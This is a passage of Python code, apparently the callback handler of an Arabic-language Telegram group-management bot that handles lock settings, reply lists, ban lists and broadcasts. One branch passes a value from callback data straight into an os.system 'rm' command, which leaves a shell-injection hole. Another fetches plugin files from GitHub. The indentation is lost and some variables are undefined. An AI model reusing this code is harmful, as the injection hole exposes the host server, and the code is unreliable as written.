Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/A3EK/AEK1-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/SoalfLove")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/SoalfLove")]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatId,TY),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("📂꒐ قائمة الصوتيات فارغة",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"📂꒐ قائمة الصوتيات فارغة","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
